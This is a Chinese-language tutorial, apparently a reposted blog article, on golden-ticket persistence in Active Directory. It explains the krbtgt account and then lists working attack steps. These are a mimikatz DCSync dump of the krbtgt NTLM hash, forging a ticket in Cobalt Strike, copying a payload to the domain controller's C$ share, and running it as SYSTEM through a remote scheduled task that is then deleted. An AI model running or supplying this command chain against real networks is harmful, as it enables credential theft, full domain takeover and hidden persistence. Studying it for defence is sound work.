黃金票據權限維持
目錄- 黃金票據權限維持
- 一、Krbtgt賬戶介紹
- 二、黃金票據原理
- 三、實驗前提
- 四、實驗步驟
一、Krbtgt賬戶介紹
krbtgt用戶,是系統在創建域時自動生成的一個帳號,其作用是密鑰分發中心的服務賬號,其密碼是系統隨機生成 的,無法登錄主機,
二、黃金票據原理
TGT=Krbtgt的NTLM哈希加密
1、Kerberos中的TGT和Logon Session Key(CT_SK)是AS回傳的,TGT它是由Krbtgt加密和簽名的,krbtgt的 NTLM Hash又是固定的,而CT_SK并不會保存在KDC中,
2、所以只要得到krbtgt的NTLM Hash,就可以偽造TGT和Logon Session Key(CT_SK),
3、Client與TGS的互動中,而已有了黃金票據后(TGT),就跳過AS驗證,不用驗證賬戶和密碼,所以也不擔心域管密碼修改,
三、實驗前提
已經控制了域名并且使用域管理員登錄或者提權的system,
條件如下:
1、域名稱
2、域的SID值
3、域的krbtgt賬號的NTLM哈希
4、偽造任意用戶名(這個可以隨意)
四、實驗步驟
1、獲取關鍵資訊
shell whoami /user 獲取域名和SID
shell net config workstation 獲取完整域名
shell wmic useraccount list brief 獲取域名和SID
shell net time /domain 獲取域主機名
2、使用mimikatz匯出krbtgt的NTLM哈希
mimikatz lsadump::dcsync /domain:candada.com /user:krbtgt
3、拿到這些資訊可以利用CS做黃金票據
4、做完后可以利用dir遠程訪問域控
shell dir \\dc.candada.com\c$
5、使用計劃任務上線cs
(1)遠程復制檔案
shell copy c:\users\administrator\desktop\can.exe \\dc.candada.com\c$
(2)設定計劃任務到域控
shell schtasks /create /s dc.candada.com /tn test /sc onstart /tr c:\can.exe /ru system /f
(3)啟動計劃任務
shell schtasks /run /s dc.candada.com /i /tn "test"
(4)洗掉計劃任務
shell schtasks /delete /s dc.candada.com /tn "test" /f
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/555563.html
標籤:其他
下一篇:返回列表